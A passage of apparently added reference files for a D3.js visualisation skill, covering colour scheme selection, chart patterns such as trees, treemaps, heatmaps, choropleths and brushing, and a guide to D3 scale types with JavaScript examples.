  '#ffa600'  // Orange
];
```

## Dynamic colour selection

### Based on data range

```javascript
function selectColourScheme(data) {
  const extent = d3.extent(data);
  const hasNegative = extent[0] < 0;
  const hasPositive = extent[1] > 0;

  if (hasNegative && hasPositive) {
    // Diverging: data crosses zero
    // (sequential scales take a two-element domain, so a three-element
    // domain pivoting on zero needs a diverging scale)
    return d3.scaleDiverging(d3.interpolateRdBu)
      .domain([extent[0], 0, extent[1]]);
  } else {
    // Sequential: all positive or all negative
    return d3.scaleSequential(d3.interpolateViridis)
      .domain(extent);
  }
}
```
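
The branch in `selectColourScheme` depends only on the data's extent, so it can be unit-tested without d3. A minimal sketch (the `schemeFamily` helper name is illustrative):

```javascript
// Pure helper: decide the scheme family from the data alone (no d3 needed)
function schemeFamily(values) {
  const min = Math.min(...values);
  const max = Math.max(...values);
  // Diverging when the data crosses zero, sequential otherwise
  return min < 0 && max > 0 ? 'diverging' : 'sequential';
}
```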

### Based on category count

```javascript
function selectCategoricalScheme(categories) {
  const n = categories.length;

  if (n <= 10) {
    return d3.scaleOrdinal(d3.schemeTableau10);
  } else if (n <= 12) {
    return d3.scaleOrdinal(d3.schemePaired);
  } else {
    // For many categories, use sequential with quantize
    return d3.scaleQuantize()
      .domain([0, n - 1])
      .range(d3.quantize(d3.interpolateRainbow, n));
  }
}
```

## Common colour mistakes to avoid

1. **Rainbow gradients for sequential data**
   - Problem: Not perceptually uniform, hard to read
   - Solution: Use Viridis, Blues, or other uniform schemes

2. **Red-green for diverging (colour blindness)**
   - Problem: 8% of males can't distinguish
   - Solution: Use blue-orange or purple-green

3. **Too many categorical colours**
   - Problem: Hard to distinguish and remember
   - Solution: Limit to 5-8 categories, use grouping

4. **Insufficient contrast**
   - Problem: Poor readability
   - Solution: Test contrast ratios, use darker colours on light backgrounds

5. **Culturally inconsistent colours**
   - Problem: Confusing semantic meaning
   - Solution: Research colour associations for target audience

6. **Inverted temperature scales**
   - Problem: Counterintuitive (red = cold)
   - Solution: Red/orange = hot, blue = cold

## Quick reference guide

**Need to show...**

- **Categories (≤10):** `d3.schemeCategory10` or `d3.schemeTableau10`
- **Categories (>10):** `d3.schemePaired` or group categories
- **Sequential (general):** `d3.interpolateViridis`
- **Sequential (scientific):** `d3.interpolateViridis` or `d3.interpolatePlasma`
- **Sequential (temperature):** `d3.interpolateRdYlBu` (inverted)
- **Diverging (zero):** `d3.interpolateRdBu` or `d3.interpolateBrBG`
- **Diverging (good/bad):** `d3.interpolateRdYlGn` (inverted)
- **Colour-blind safe (categorical):** Okabe-Ito palette (shown above)
- **Colour-blind safe (sequential):** `d3.interpolateCividis` or `d3.interpolateBlues`
- **Colour-blind safe (diverging):** `d3.interpolatePuOr` or `d3.interpolateBrBG`

**Always remember:**

1. Test for colour-blindness
2. Ensure sufficient contrast
3. Use semantic colours appropriately
4. Add redundant encoding (patterns, labels)
5. Keep it simple (fewer colours = clearer visualisation)

---

**New file:** `skills/claude-d3js-skill/references/d3-patterns.md` (869 lines)

# D3.js Visualisation Patterns

This reference provides detailed code patterns for common d3.js visualisation types.

## Hierarchical visualisations

### Tree diagram

```javascript
useEffect(() => {
  if (!data) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 600;

  const tree = d3.tree().size([height - 100, width - 200]);

  const root = d3.hierarchy(data);
  tree(root);

  const g = svg.append("g")
    .attr("transform", "translate(100,50)");

  // Links
  g.selectAll("path")
    .data(root.links())
    .join("path")
    .attr("d", d3.linkHorizontal()
      .x(d => d.y)
      .y(d => d.x))
    .attr("fill", "none")
    .attr("stroke", "#555")
    .attr("stroke-width", 2);

  // Nodes
  const node = g.selectAll("g")
    .data(root.descendants())
    .join("g")
    .attr("transform", d => `translate(${d.y},${d.x})`);

  node.append("circle")
    .attr("r", 6)
    .attr("fill", d => d.children ? "#555" : "#999");

  node.append("text")
    .attr("dy", "0.31em")
    .attr("x", d => d.children ? -8 : 8)
    .attr("text-anchor", d => d.children ? "end" : "start")
    .text(d => d.data.name)
    .style("font-size", "12px");

}, [data]);
```

### Treemap

```javascript
useEffect(() => {
  if (!data) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 600;

  const root = d3.hierarchy(data)
    .sum(d => d.value)
    .sort((a, b) => b.value - a.value);

  d3.treemap()
    .size([width, height])
    .padding(2)
    .round(true)(root);

  const colourScale = d3.scaleOrdinal(d3.schemeCategory10);

  const cell = svg.selectAll("g")
    .data(root.leaves())
    .join("g")
    .attr("transform", d => `translate(${d.x0},${d.y0})`);

  cell.append("rect")
    .attr("width", d => d.x1 - d.x0)
    .attr("height", d => d.y1 - d.y0)
    .attr("fill", d => colourScale(d.parent.data.name))
    .attr("stroke", "white")
    .attr("stroke-width", 2);

  cell.append("text")
    .attr("x", 4)
    .attr("y", 16)
    .text(d => d.data.name)
    .style("font-size", "12px")
    .style("fill", "white");

}, [data]);
```

### Sunburst diagram

```javascript
useEffect(() => {
  if (!data) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 600;
  const height = 600;
  const radius = Math.min(width, height) / 2;

  const root = d3.hierarchy(data)
    .sum(d => d.value)
    .sort((a, b) => b.value - a.value);

  const partition = d3.partition()
    .size([2 * Math.PI, radius]);

  partition(root);

  const arc = d3.arc()
    .startAngle(d => d.x0)
    .endAngle(d => d.x1)
    .innerRadius(d => d.y0)
    .outerRadius(d => d.y1);

  const colourScale = d3.scaleOrdinal(d3.schemeCategory10);

  const g = svg.append("g")
    .attr("transform", `translate(${width / 2},${height / 2})`);

  g.selectAll("path")
    .data(root.descendants())
    .join("path")
    .attr("d", arc)
    .attr("fill", d => colourScale(d.depth))
    .attr("stroke", "white")
    .attr("stroke-width", 1);

}, [data]);
```

### Chord diagram

```javascript
function drawChordDiagram(data) {
  // data format: array of objects with source, target, and value
  // Example: [{ source: 'A', target: 'B', value: 10 }, ...]

  if (!data || data.length === 0) return;

  const svg = d3.select('#chart');
  svg.selectAll("*").remove();

  const width = 600;
  const height = 600;
  const innerRadius = Math.min(width, height) * 0.3;
  const outerRadius = innerRadius + 30;

  // Create matrix from data
  const nodes = Array.from(new Set(data.flatMap(d => [d.source, d.target])));
  const matrix = Array.from({ length: nodes.length }, () => Array(nodes.length).fill(0));

  data.forEach(d => {
    const i = nodes.indexOf(d.source);
    const j = nodes.indexOf(d.target);
    matrix[i][j] += d.value;
    matrix[j][i] += d.value;
  });

  // Create chord layout
  const chord = d3.chord()
    .padAngle(0.05)
    .sortSubgroups(d3.descending);

  const arc = d3.arc()
    .innerRadius(innerRadius)
    .outerRadius(outerRadius);

  const ribbon = d3.ribbon()
    .source(d => d.source)
    .target(d => d.target);

  const colourScale = d3.scaleOrdinal(d3.schemeCategory10)
    .domain(nodes);

  const g = svg.append("g")
    .attr("transform", `translate(${width / 2},${height / 2})`);

  const chords = chord(matrix);

  // Draw ribbons
  g.append("g")
    .attr("fill-opacity", 0.67)
    .selectAll("path")
    .data(chords)
    .join("path")
    .attr("d", ribbon)
    .attr("fill", d => colourScale(nodes[d.source.index]))
    .attr("stroke", d => d3.rgb(colourScale(nodes[d.source.index])).darker());

  // Draw groups (arcs)
  const group = g.append("g")
    .selectAll("g")
    .data(chords.groups)
    .join("g");

  group.append("path")
    .attr("d", arc)
    .attr("fill", d => colourScale(nodes[d.index]))
    .attr("stroke", d => d3.rgb(colourScale(nodes[d.index])).darker());

  // Add labels
  group.append("text")
    .each(d => { d.angle = (d.startAngle + d.endAngle) / 2; })
    .attr("dy", "0.31em")
    .attr("transform", d => `rotate(${(d.angle * 180 / Math.PI) - 90})translate(${outerRadius + 30})${d.angle > Math.PI ? "rotate(180)" : ""}`)
    .attr("text-anchor", d => d.angle > Math.PI ? "end" : null)
    .text((d, i) => nodes[i])
    .style("font-size", "12px");
}

// Data format example:
// const data = [
//   { source: 'Category A', target: 'Category B', value: 100 },
//   { source: 'Category A', target: 'Category C', value: 50 },
//   { source: 'Category B', target: 'Category C', value: 75 }
// ];
// drawChordDiagram(data);
```
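
The matrix-building step is the only data wrangling in the chord example, and it can be checked in isolation. A standalone sketch of that step (no d3; `buildMatrix` is an illustrative name):

```javascript
// Build the symmetric flow matrix d3.chord expects from an edge list
function buildMatrix(data) {
  const nodes = Array.from(new Set(data.flatMap(d => [d.source, d.target])));
  const matrix = Array.from({ length: nodes.length }, () => Array(nodes.length).fill(0));
  data.forEach(d => {
    const i = nodes.indexOf(d.source);
    const j = nodes.indexOf(d.target);
    matrix[i][j] += d.value;
    matrix[j][i] += d.value; // mirror: flows are treated as undirected
  });
  return { nodes, matrix };
}
```

For a directed chord diagram you would drop the mirroring line and keep `matrix[i][j]` only.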

## Advanced chart types

### Heatmap

```javascript
function drawHeatmap(data) {
  // data format: array of objects with row, column, and value
  // Example: [{ row: 'A', column: 'X', value: 10 }, ...]

  if (!data || data.length === 0) return;

  const svg = d3.select('#chart');
  svg.selectAll("*").remove();

  const width = 800;
  const height = 600;
  const margin = { top: 100, right: 30, bottom: 30, left: 100 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  // Get unique rows and columns
  const rows = Array.from(new Set(data.map(d => d.row)));
  const columns = Array.from(new Set(data.map(d => d.column)));

  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  // Create scales
  const xScale = d3.scaleBand()
    .domain(columns)
    .range([0, innerWidth])
    .padding(0.01);

  const yScale = d3.scaleBand()
    .domain(rows)
    .range([0, innerHeight])
    .padding(0.01);

  // Colour scale for values (sequential from light to dark red)
  const colourScale = d3.scaleSequential(d3.interpolateYlOrRd)
    .domain([0, d3.max(data, d => d.value)]);

  // Draw rectangles
  g.selectAll("rect")
    .data(data)
    .join("rect")
    .attr("x", d => xScale(d.column))
    .attr("y", d => yScale(d.row))
    .attr("width", xScale.bandwidth())
    .attr("height", yScale.bandwidth())
    .attr("fill", d => colourScale(d.value));

  // Add x-axis labels
  svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`)
    .selectAll("text")
    .data(columns)
    .join("text")
    .attr("x", d => xScale(d) + xScale.bandwidth() / 2)
    .attr("y", -10)
    .attr("text-anchor", "middle")
    .text(d => d)
    .style("font-size", "12px");

  // Add y-axis labels
  svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`)
    .selectAll("text")
    .data(rows)
    .join("text")
    .attr("x", -10)
    .attr("y", d => yScale(d) + yScale.bandwidth() / 2)
    .attr("dy", "0.35em")
    .attr("text-anchor", "end")
    .text(d => d)
    .style("font-size", "12px");

  // Add colour legend
  const legendWidth = 20;
  const legendHeight = 200;
  const legend = svg.append("g")
    .attr("transform", `translate(${width - 60},${margin.top})`);

  const legendScale = d3.scaleLinear()
    .domain(colourScale.domain())
    .range([legendHeight, 0]);

  const legendAxis = d3.axisRight(legendScale).ticks(5);

  // Draw colour gradient in legend
  for (let i = 0; i < legendHeight; i++) {
    legend.append("rect")
      .attr("y", i)
      .attr("width", legendWidth)
      .attr("height", 1)
      .attr("fill", colourScale(legendScale.invert(i)));
  }

  legend.append("g")
    .attr("transform", `translate(${legendWidth},0)`)
    .call(legendAxis);
}

// Data format example:
// const data = [
//   { row: 'Monday', column: 'Morning', value: 42 },
//   { row: 'Monday', column: 'Afternoon', value: 78 },
//   { row: 'Tuesday', column: 'Morning', value: 65 },
//   { row: 'Tuesday', column: 'Afternoon', value: 55 }
// ];
// drawHeatmap(data);
```

### Area chart with gradient

```javascript
useEffect(() => {
  if (!data || data.length === 0) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 400;
  const margin = { top: 20, right: 30, bottom: 40, left: 50 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  // Define gradient
  const defs = svg.append("defs");
  const gradient = defs.append("linearGradient")
    .attr("id", "areaGradient")
    .attr("x1", "0%")
    .attr("x2", "0%")
    .attr("y1", "0%")
    .attr("y2", "100%");

  gradient.append("stop")
    .attr("offset", "0%")
    .attr("stop-color", "steelblue")
    .attr("stop-opacity", 0.8);

  gradient.append("stop")
    .attr("offset", "100%")
    .attr("stop-color", "steelblue")
    .attr("stop-opacity", 0.1);

  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  const xScale = d3.scaleTime()
    .domain(d3.extent(data, d => d.date))
    .range([0, innerWidth]);

  const yScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.value)])
    .range([innerHeight, 0]);

  const area = d3.area()
    .x(d => xScale(d.date))
    .y0(innerHeight)
    .y1(d => yScale(d.value))
    .curve(d3.curveMonotoneX);

  g.append("path")
    .datum(data)
    .attr("fill", "url(#areaGradient)")
    .attr("d", area);

  const line = d3.line()
    .x(d => xScale(d.date))
    .y(d => yScale(d.value))
    .curve(d3.curveMonotoneX);

  g.append("path")
    .datum(data)
    .attr("fill", "none")
    .attr("stroke", "steelblue")
    .attr("stroke-width", 2)
    .attr("d", line);

  g.append("g")
    .attr("transform", `translate(0,${innerHeight})`)
    .call(d3.axisBottom(xScale));

  g.append("g")
    .call(d3.axisLeft(yScale));

}, [data]);
```

### Stacked bar chart

```javascript
useEffect(() => {
  if (!data || data.length === 0) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 400;
  const margin = { top: 20, right: 30, bottom: 40, left: 50 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  const categories = Object.keys(data[0]).filter(k => k !== 'group');
  const stackedData = d3.stack().keys(categories)(data);

  const xScale = d3.scaleBand()
    .domain(data.map(d => d.group))
    .range([0, innerWidth])
    .padding(0.1);

  const yScale = d3.scaleLinear()
    .domain([0, d3.max(stackedData[stackedData.length - 1], d => d[1])])
    .range([innerHeight, 0]);

  const colourScale = d3.scaleOrdinal(d3.schemeCategory10);

  g.selectAll("g")
    .data(stackedData)
    .join("g")
    .attr("fill", (d, i) => colourScale(i))
    .selectAll("rect")
    .data(d => d)
    .join("rect")
    .attr("x", d => xScale(d.data.group))
    .attr("y", d => yScale(d[1]))
    .attr("height", d => yScale(d[0]) - yScale(d[1]))
    .attr("width", xScale.bandwidth());

  g.append("g")
    .attr("transform", `translate(0,${innerHeight})`)
    .call(d3.axisBottom(xScale));

  g.append("g")
    .call(d3.axisLeft(yScale));

}, [data]);
```
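
What `d3.stack` produces for each series is just a pair of cumulative offsets `[y0, y1]` per row, accumulated over the preceding keys. A d3-free sketch of that computation (the `stackRows` helper name is illustrative):

```javascript
// Compute stacked [y0, y1] bands per key, mirroring what d3.stack returns
function stackRows(data, keys) {
  return keys.map((key, ki) =>
    data.map(row => {
      // Baseline = sum of all earlier keys in this row
      const y0 = keys.slice(0, ki).reduce((sum, k) => sum + row[k], 0);
      return [y0, y0 + row[key]];
    })
  );
}
```

This is why the y-scale above only needs the top band of the last series: its `d[1]` values are the full column totals.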

### Grouped bar chart

```javascript
useEffect(() => {
  if (!data || data.length === 0) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 400;
  const margin = { top: 20, right: 30, bottom: 40, left: 50 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  const categories = Object.keys(data[0]).filter(k => k !== 'group');

  const x0Scale = d3.scaleBand()
    .domain(data.map(d => d.group))
    .range([0, innerWidth])
    .padding(0.1);

  const x1Scale = d3.scaleBand()
    .domain(categories)
    .range([0, x0Scale.bandwidth()])
    .padding(0.05);

  const yScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => Math.max(...categories.map(c => d[c])))])
    .range([innerHeight, 0]);

  const colourScale = d3.scaleOrdinal(d3.schemeCategory10);

  const group = g.selectAll("g")
    .data(data)
    .join("g")
    .attr("transform", d => `translate(${x0Scale(d.group)},0)`);

  group.selectAll("rect")
    .data(d => categories.map(key => ({ key, value: d[key] })))
    .join("rect")
    .attr("x", d => x1Scale(d.key))
    .attr("y", d => yScale(d.value))
    .attr("width", x1Scale.bandwidth())
    .attr("height", d => innerHeight - yScale(d.value))
    .attr("fill", d => colourScale(d.key));

  g.append("g")
    .attr("transform", `translate(0,${innerHeight})`)
    .call(d3.axisBottom(x0Scale));

  g.append("g")
    .call(d3.axisLeft(yScale));

}, [data]);
```

### Bubble chart

```javascript
useEffect(() => {
  if (!data || data.length === 0) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 600;
  const margin = { top: 20, right: 30, bottom: 40, left: 50 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  const xScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.x)])
    .range([0, innerWidth]);

  const yScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.y)])
    .range([innerHeight, 0]);

  const sizeScale = d3.scaleSqrt()
    .domain([0, d3.max(data, d => d.size)])
    .range([0, 50]);

  const colourScale = d3.scaleOrdinal(d3.schemeCategory10);

  g.selectAll("circle")
    .data(data)
    .join("circle")
    .attr("cx", d => xScale(d.x))
    .attr("cy", d => yScale(d.y))
    .attr("r", d => sizeScale(d.size))
    .attr("fill", d => colourScale(d.category))
    .attr("opacity", 0.6)
    .attr("stroke", "white")
    .attr("stroke-width", 2);

  g.append("g")
    .attr("transform", `translate(0,${innerHeight})`)
    .call(d3.axisBottom(xScale));

  g.append("g")
    .call(d3.axisLeft(yScale));

}, [data]);
```

## Geographic visualisations

### Basic map with points

```javascript
useEffect(() => {
  if (!geoData || !pointData) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 600;

  const projection = d3.geoMercator()
    .fitSize([width, height], geoData);

  const pathGenerator = d3.geoPath().projection(projection);

  // Draw map
  svg.selectAll("path")
    .data(geoData.features)
    .join("path")
    .attr("d", pathGenerator)
    .attr("fill", "#e0e0e0")
    .attr("stroke", "#999")
    .attr("stroke-width", 0.5);

  // Draw points
  svg.selectAll("circle")
    .data(pointData)
    .join("circle")
    .attr("cx", d => projection([d.longitude, d.latitude])[0])
    .attr("cy", d => projection([d.longitude, d.latitude])[1])
    .attr("r", 5)
    .attr("fill", "steelblue")
    .attr("opacity", 0.7);

}, [geoData, pointData]);
```
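
Behind `d3.geoMercator`, the forward projection itself is standard spherical Mercator maths; `fitSize` then scales and translates the result to the viewport. The core transform is small enough to sketch by hand (plain JS, unit sphere, no d3; not the exact internal d3 code):

```javascript
// Spherical Mercator forward projection: degrees in, unit-sphere coordinates out
function mercator(lonDeg, latDeg) {
  const lambda = (lonDeg * Math.PI) / 180;
  const phi = (latDeg * Math.PI) / 180;
  return [lambda, Math.log(Math.tan(Math.PI / 4 + phi / 2))];
}

// The equator maps to y = 0; y grows without bound towards the poles,
// which is why Mercator maps clip high latitudes
```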

### Choropleth map

```javascript
useEffect(() => {
  if (!geoData || !valueData) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 600;

  const projection = d3.geoMercator()
    .fitSize([width, height], geoData);

  const pathGenerator = d3.geoPath().projection(projection);

  // Create value lookup
  const valueLookup = new Map(valueData.map(d => [d.id, d.value]));

  // Colour scale
  const colourScale = d3.scaleSequential(d3.interpolateBlues)
    .domain([0, d3.max(valueData, d => d.value)]);

  svg.selectAll("path")
    .data(geoData.features)
    .join("path")
    .attr("d", pathGenerator)
    .attr("fill", d => {
      const value = valueLookup.get(d.id);
      return value ? colourScale(value) : "#e0e0e0";
    })
    .attr("stroke", "#999")
    .attr("stroke-width", 0.5);

}, [geoData, valueData]);
```

## Advanced interactions

### Brush and zoom

```javascript
useEffect(() => {
  if (!data || data.length === 0) return;

  const svg = d3.select(svgRef.current);
  svg.selectAll("*").remove();

  const width = 800;
  const height = 400;
  const margin = { top: 20, right: 30, bottom: 40, left: 50 };
  const innerWidth = width - margin.left - margin.right;
  const innerHeight = height - margin.top - margin.bottom;

  const xScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.x)])
    .range([0, innerWidth]);

  const yScale = d3.scaleLinear()
    .domain([0, d3.max(data, d => d.y)])
    .range([innerHeight, 0]);

  const g = svg.append("g")
    .attr("transform", `translate(${margin.left},${margin.top})`);

  const circles = g.selectAll("circle")
    .data(data)
    .join("circle")
    .attr("cx", d => xScale(d.x))
    .attr("cy", d => yScale(d.y))
    .attr("r", 5)
    .attr("fill", "steelblue");

  // Add brush
  const brush = d3.brush()
    .extent([[0, 0], [innerWidth, innerHeight]])
    .on("start brush", (event) => {
      if (!event.selection) return;

      const [[x0, y0], [x1, y1]] = event.selection;

      circles.attr("fill", d => {
        const cx = xScale(d.x);
        const cy = yScale(d.y);
        return (cx >= x0 && cx <= x1 && cy >= y0 && cy <= y1)
          ? "orange"
          : "steelblue";
      });
    });

  g.append("g")
    .attr("class", "brush")
    .call(brush);

}, [data]);
```

### Linked brushing between charts

```javascript
function LinkedCharts({ data }) {
  const [selectedPoints, setSelectedPoints] = useState(new Set());
  const svg1Ref = useRef();
  const svg2Ref = useRef();

  useEffect(() => {
    // Chart 1: Scatter plot
    const svg1 = d3.select(svg1Ref.current);
    svg1.selectAll("*").remove();

    // ... create first chart (the elided setup defines the xScale
    // and yScale used in the brush handler below) ...

    const circles1 = svg1.selectAll("circle")
      .data(data)
      .join("circle")
      .attr("fill", d => selectedPoints.has(d.id) ? "orange" : "steelblue");

    // Chart 2: Bar chart
    const svg2 = d3.select(svg2Ref.current);
    svg2.selectAll("*").remove();

    // ... create second chart ...

    const bars = svg2.selectAll("rect")
      .data(data)
      .join("rect")
      .attr("fill", d => selectedPoints.has(d.id) ? "orange" : "steelblue");

    // Add brush to first chart
    const brush = d3.brush()
      .on("start brush end", (event) => {
        if (!event.selection) {
          setSelectedPoints(new Set());
          return;
        }

        const [[x0, y0], [x1, y1]] = event.selection;
        const selected = new Set();

        data.forEach(d => {
          const x = xScale(d.x);
          const y = yScale(d.y);
          if (x >= x0 && x <= x1 && y >= y0 && y <= y1) {
            selected.add(d.id);
          }
        });

        setSelectedPoints(selected);
      });

    svg1.append("g").call(brush);

  }, [data, selectedPoints]);

  return (
    <div>
      <svg ref={svg1Ref} width="400" height="300" />
      <svg ref={svg2Ref} width="400" height="300" />
    </div>
  );
}
```
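
The hit-testing at the heart of both brush handlers is plain geometry and easy to verify on its own. A minimal sketch (names illustrative; the real handlers work in pixel space via the scales):

```javascript
// Which point ids fall inside a brushed rectangle [[x0, y0], [x1, y1]]?
function pointsInRect(points, [[x0, y0], [x1, y1]]) {
  return new Set(
    points
      .filter(p => p.x >= x0 && p.x <= x1 && p.y >= y0 && p.y <= y1)
      .map(p => p.id)
  );
}
```

Keeping the selected ids in shared state, as `LinkedCharts` does, is what lets every chart recolour from the same `Set`.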

## Animation patterns

### Enter, update, exit with transitions

```javascript
useEffect(() => {
  if (!data || data.length === 0) return;

  const svg = d3.select(svgRef.current);

  const circles = svg.selectAll("circle")
    .data(data, d => d.id); // Key function for object constancy

  // EXIT: Remove old elements
  circles.exit()
    .transition()
    .duration(500)
    .attr("r", 0)
    .remove();

  // UPDATE: Modify existing elements
  circles
    .transition()
    .duration(500)
    .attr("cx", d => xScale(d.x))
    .attr("cy", d => yScale(d.y))
    .attr("fill", "steelblue");

  // ENTER: Add new elements
  circles.enter()
    .append("circle")
    .attr("cx", d => xScale(d.x))
    .attr("cy", d => yScale(d.y))
    .attr("r", 0)
    .attr("fill", "steelblue")
    .transition()
    .duration(500)
    .attr("r", 5);

}, [data]);
```

### Path morphing

```javascript
useEffect(() => {
  if (!data1 || !data2) return;

  const svg = d3.select(svgRef.current);

  const line = d3.line()
    .x(d => xScale(d.x))
    .y(d => yScale(d.y))
    .curve(d3.curveMonotoneX);

  const path = svg.select("path");

  // Morph from data1 to data2
  path
    .datum(data1)
    .attr("d", line)
    .transition()
    .duration(1000)
    .attrTween("d", function() {
      const previous = d3.select(this).attr("d");
      const current = line(data2);
      // Note: d3.interpolatePath comes from the d3-interpolate-path
      // plugin, not from d3 core
      return d3.interpolatePath(previous, current);
    });

}, [data1, data2]);
```

---

**New file:** `skills/claude-d3js-skill/references/scale-reference.md` (509 lines)

# D3.js Scale Reference

Comprehensive guide to all d3 scale types with examples and use cases.

## Continuous scales

### Linear scale

Maps continuous input domain to continuous output range with linear interpolation.

```javascript
const scale = d3.scaleLinear()
  .domain([0, 100])
  .range([0, 500]);

scale(50);   // Returns 250
scale(0);    // Returns 0
scale(100);  // Returns 500

// Invert scale (get input from output)
scale.invert(250); // Returns 50
```
|
||||
|
||||
**Use cases:**
|
||||
- Most common scale for quantitative data
|
||||
- Axes, bar lengths, position encoding
|
||||
- Temperature, prices, counts, measurements
|
||||
|
||||
**Methods:**
|
||||
- `.domain([min, max])` - Set input domain
|
||||
- `.range([min, max])` - Set output range
|
||||
- `.invert(value)` - Get domain value from range value
|
||||
- `.clamp(true)` - Restrict output to range bounds
|
||||
- `.nice()` - Extend domain to nice round values
|
||||
|
||||
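Under the hood this is just an affine map. A minimal dependency-free sketch (illustrative only; `makeLinear` is not a D3 API) reproduces the numbers above:

```javascript
// y = r0 + (x - d0) / (d1 - d0) * (r1 - r0), plus the inverse map.
function makeLinear([d0, d1], [r0, r1]) {
  const scale = x => r0 + ((x - d0) / (d1 - d0)) * (r1 - r0);
  scale.invert = y => d0 + ((y - r0) / (r1 - r0)) * (d1 - d0);
  return scale;
}

const scale = makeLinear([0, 100], [0, 500]);
console.log(scale(50));        // 250
console.log(scale.invert(250)); // 50
```
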
### Power scale

Maps continuous input to continuous output with exponential transformation.

```javascript
const sqrtScale = d3.scalePow()
  .exponent(0.5) // Square root
  .domain([0, 100])
  .range([0, 500]);

const squareScale = d3.scalePow()
  .exponent(2) // Square
  .domain([0, 100])
  .range([0, 500]);

// Shorthand for square root
const sqrtScale2 = d3.scaleSqrt()
  .domain([0, 100])
  .range([0, 500]);
```

**Use cases:**
- Perceptual scaling (human perception is non-linear)
- Area encoding (use square root to map values to circle radii)
- Emphasising differences in small or large values

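The core idea can be sketched in plain JavaScript (a simplified model for non-negative domains; D3's real implementation also handles negative values): normalise in the transformed space, then rescale.

```javascript
// Sketch of a power scale: transform, normalise, rescale.
function makePow([d0, d1], [r0, r1], exponent) {
  const e = x => Math.pow(x, exponent);
  return x => r0 + ((e(x) - e(d0)) / (e(d1) - e(d0))) * (r1 - r0);
}

const sqrt = makePow([0, 100], [0, 500], 0.5);
// Quadrupling the data value only doubles the output, so circle AREA
// (proportional to radius squared) stays proportional to the value.
console.log(sqrt(25));  // 250
console.log(sqrt(100)); // 500
```
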
### Logarithmic scale

Maps continuous input to continuous output with logarithmic transformation.

```javascript
const logScale = d3.scaleLog()
  .domain([1, 1000]) // Must not include zero
  .range([0, 500]);

logScale(1);    // Returns 0
logScale(10);   // Returns ~167
logScale(100);  // Returns ~333
logScale(1000); // Returns 500
```

**Use cases:**
- Data spanning multiple orders of magnitude
- Population, GDP, wealth distributions
- Logarithmic axes
- Exponential growth visualisations

**Important:** The domain must not include or cross zero (all values strictly positive, or all strictly negative).

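The example outputs above follow from interpolating in log space; a dependency-free sketch (illustrative, not the D3 implementation) confirms them:

```javascript
// Sketch of a log scale: linear interpolation over log(x).
function makeLog([d0, d1], [r0, r1]) {
  const l = Math.log;
  return x => r0 + ((l(x) - l(d0)) / (l(d1) - l(d0))) * (r1 - r0);
}

const logScale = makeLog([1, 1000], [0, 500]);
console.log(Math.round(logScale(10)));  // 167
console.log(Math.round(logScale(100))); // 333
console.log(logScale(1000));            // 500
```
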
### Time scale

Specialised linear scale for temporal data.

```javascript
const timeScale = d3.scaleTime()
  .domain([new Date(2020, 0, 1), new Date(2024, 0, 1)])
  .range([0, 800]);

timeScale(new Date(2022, 0, 1)); // Returns ~400 (midpoint of the domain)

// Invert to get date
timeScale.invert(400); // Returns a Date near 1 January 2022
```

**Use cases:**
- Time series visualisations
- Timeline axes
- Temporal animations
- Date-based interactions

**Methods:**
- `.nice()` - Extend domain to nice time intervals
- `.ticks(count)` - Generate nicely-spaced tick values
- All linear scale methods apply

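A time scale is simply a linear scale over millisecond timestamps; a rough sketch (illustrative only) shows why the January 2022 value lands near 400:

```javascript
// Sketch: convert Dates to epoch milliseconds, then map linearly.
function makeTime([t0, t1], [r0, r1]) {
  const a = t0.getTime(), b = t1.getTime();
  const scale = d => r0 + ((d.getTime() - a) / (b - a)) * (r1 - r0);
  scale.invert = y => new Date(a + ((y - r0) / (r1 - r0)) * (b - a));
  return scale;
}

const timeScale = makeTime(
  [new Date(2020, 0, 1), new Date(2024, 0, 1)], [0, 800]);
// ~400: 2022-01-01 is 731 of 1461 days in, slightly past half (leap day).
console.log(Math.round(timeScale(new Date(2022, 0, 1))));
```
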
### Quantize scale

Maps continuous input to discrete output buckets.

```javascript
const quantizeScale = d3.scaleQuantize()
  .domain([0, 100])
  .range(['low', 'medium', 'high']);

quantizeScale(25); // Returns 'low'
quantizeScale(50); // Returns 'medium'
quantizeScale(75); // Returns 'high'

// Get the threshold values
quantizeScale.thresholds(); // Returns [33.33, 66.67]
```

**Use cases:**
- Binning continuous data
- Heat map colours
- Risk categories (low/medium/high)
- Age groups, income brackets

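Quantize buckets are equal-width slices of the domain; a small plain-JavaScript sketch (not D3's code) makes the thresholds explicit:

```javascript
// Sketch of a quantize scale: n equal-width buckets over [d0, d1].
function makeQuantize([d0, d1], range) {
  const n = range.length;
  const scale = x => {
    const i = Math.floor(((x - d0) / (d1 - d0)) * n);
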